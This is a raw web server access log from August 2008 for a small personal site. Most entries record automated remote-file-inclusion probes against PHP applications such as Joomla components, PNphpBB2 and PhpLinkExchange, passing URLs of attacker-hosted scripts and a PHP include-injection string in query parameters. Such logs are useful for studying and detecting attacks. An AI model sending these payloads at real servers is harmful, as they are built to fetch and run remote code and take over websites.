195.117.241.196 - - [10/Aug/2008:10:27:22 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:27:36 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:27:38 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:27:40 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:27:42 -0700] "GET /logs/access_080226.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:27:43 -0700] "GET /logs/access_080309.log/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.228.192.194 - - [10/Aug/2008:10:27:44 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://d35m0.homeunix.net/R7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:27:46 -0700] "GET /logs/access_080724.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:27:48 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:27:50 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:27:55 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:10:28:07 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:10:28:07 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
70.174.27.199 - - [10/Aug/2008:10:28:26 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?s=2e5776a96d451c69801bfe753ec0a15e&showtopic=36984&st=0&p=522096&#entry522096" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
216.127.192.12 - - [10/Aug/2008:10:28:27 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.127.192.12 - - [10/Aug/2008:10:28:27 -0700] "GET //include/functions_common.php?gl_root_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.127.192.12 - - [10/Aug/2008:10:28:27 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.127.192.12 - - [10/Aug/2008:10:28:33 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.127.192.12 - - [10/Aug/2008:10:28:33 -0700] "GET //include/functions_common.php?gl_root_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.127.192.12 - - [10/Aug/2008:10:28:33 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.205.67.205 - - [10/Aug/2008:10:28:34 -0700] "GET /logs//index.php?view=page&pagename=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
67.205.67.205 - - [10/Aug/2008:10:28:35 -0700] "GET //index.php?view=page&pagename=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 200 5829 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:28:37 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:28:40 -0700] "GET /logs/access_080329.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:10:28:42 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:28:43 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:28:45 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:10:28:47 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:10:28:48 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:28:51 -0700] "GET /logs/access_080131.log/scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:28:53 -0700] "GET /scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:28:55 -0700] "GET /logs/scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.127.192.12 - - [10/Aug/2008:10:29:10 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.127.192.12 - - [10/Aug/2008:10:29:10 -0700] "GET //include/functions_common.php?gl_root_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:29:32 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:29:32 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:29:32 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:29:32 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:29:33 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:29:33 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:29:33 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:29:33 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.191.136 - - [10/Aug/2008:10:29:46 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [10/Aug/2008:10:29:47 -0700] "GET //include/functions_common.php?gl_root_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [10/Aug/2008:10:29:47 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:30:02 -0700] "GET /logs/access_080329.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:30:03 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:30:03 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:30:18 -0700] "GET /logs/access_080305.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:31:04 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:31:04 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.25.230.39 - - [10/Aug/2008:10:31:19 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:31:25 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:10:31:45 -0700] "GET //errors.php?error=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:10:31:46 -0700] "GET /logs//errors.php?error=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:31:46 -0700] "GET /logs/access_080209.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:32:04 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:32:04 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:32:09 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:32:10 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:32:16 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:32:23 -0700] "GET /logs/access_080209.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:32:29 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:32:30 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:32:31 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:32:31 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.192.12 - - [10/Aug/2008:10:32:49 -0700] "GET /logs/access_080218.log//include/functions_common.php?gl_root_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.127.192.12 - - [10/Aug/2008:10:32:49 -0700] "GET /logs/access_080218.log//include/functions_common.php?gl_root_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.133.96.246 - - [10/Aug/2008:10:32:52 -0700] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.133.96.246 - - [10/Aug/2008:10:32:52 -0700] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:32:55 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:33:14 -0700] "GET /logs/access_071226.log//admin/spaw/spaw_control.class.php?spaw_root=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:33:26 -0700] "GET /scanhttp://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:10:33:43 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:10:33:43 -0700] "GET //include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:10:33:43 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:10:33:43 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:10:33:43 -0700] "GET //include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:10:33:43 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.25 - - [10/Aug/2008:10:33:46 -0700] "GET /bikes/dteel/2008_01_27/Medium/ HTTP/1.1" 200 4825 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:33:57 -0700] "GET /logs//htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:33:57 -0700] "GET //htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:34:12 -0700] "GET /logs/access_080714.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:34:13 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 200 18465 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:34:13 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:34:17 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:10:34:20 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:10:34:20 -0700] "GET //include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:10:34:20 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:34:29 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:10:34:49 -0700] "GET /logs/access_080507.log//htmltonuke.php?http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.106.191.136 - - [10/Aug/2008:10:35:03 -0700] "GET /logs/access_080218.log//include/functions_common.php?gl_root_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:10:35:05 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [10/Aug/2008:10:35:33 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
67.205.67.205 - - [10/Aug/2008:10:35:33 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 200 18619 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:10:36:26 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:10:36:26 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:10:36:38 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:10:36:38 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:10:36:38 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:36:41 -0700] "GET /logs/access_080110.log//htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:36:41 -0700] "GET //htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:36:42 -0700] "GET /logs//htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:36:43 -0700] "GET /logs/access_080110.log//htmltonuke.php?http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:36:43 -0700] "GET //htmltonuke.php?http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:10:36:43 -0700] "GET /logs//htmltonuke.php?http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
